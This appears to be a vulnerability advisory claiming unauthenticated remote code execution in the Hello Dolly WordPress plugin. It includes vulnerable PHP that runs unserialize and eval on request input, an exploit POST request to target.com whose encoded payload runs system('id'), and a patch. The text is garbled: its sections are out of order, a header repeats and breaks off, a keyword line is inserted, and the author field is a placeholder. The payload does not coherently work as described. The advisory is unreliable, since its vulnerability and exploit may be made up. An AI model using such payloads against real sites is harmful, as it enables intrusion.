Date: April 13, 2026 Researcher: [Your Name / Team] Affected Software: Hello Dolly Plugin for WordPress Version: 1.7.2 Severity: Critical (CVSS 9.8) 1. Overview Hello Dolly is a simple, widely-installed WordPress plugin that displays random lyrics from the song “Hello, Dolly!” in the admin dashboard. Version 1.7.2 — last updated in 2020 — contains a severe security flaw that allows unauthenticated remote code execution (RCE) via mishandling of a legacy AJAX hook.
WordPress core team should consider automatically disabling or deleting Hello Dolly in a future update due to its legacy nature and lack of maintainer. This review is for defensive security research only. No active exploitation should be attempted without authorization. hello dolly 1.7.2 exploit
$index = unserialize(base64_decode($_REQUEST['lyric_index'])); eval('echo $lyrics[' . $index . '];'); Because wp_ajax_nopriv_ allows unauthenticated access, an attacker can send a POST request to /wp-admin/admin-ajax.php?action=hello_dolly_lyric with a crafted lyric_index payload that breaks out of the array access and executes arbitrary PHP. POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded action=hello_dolly_lyric&lyric_index=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bs%3A20%3A%22%3B%7D%3Bsystem(%27id%27)%3B%2F%2F%22%3B%7D Date: April 13, 2026 Researcher: [Your Name /
// Replace the vulnerable line with: if ( ! wp_verify_nonce( $_REQUEST['_wpnonce'], 'hello_dolly_lyric' ) || ! current_user_can( 'read' ) ) wp_die('Unauthorized'); The vulnerability resides in hello-dolly.php
add_action('wp_ajax_nopriv_hello_dolly_lyric', 'hello_dolly_get_lyric'); The function hello_dolly_get_lyric() fetches a random lyric and echoes it — but in 1.7.2, it also unserializes a lyric_index parameter from the request without sanitization or nonce verification:
The plugin is present on millions of sites (often inactive but still present in wp-content/plugins/hello-dolly/ ), making this a high-impact vulnerability. The vulnerability resides in hello-dolly.php , line 56:
$index = intval( $_REQUEST['lyric_index'] ); if ( isset( $lyrics[$index] ) ) echo esc_html( $lyrics[$index] );
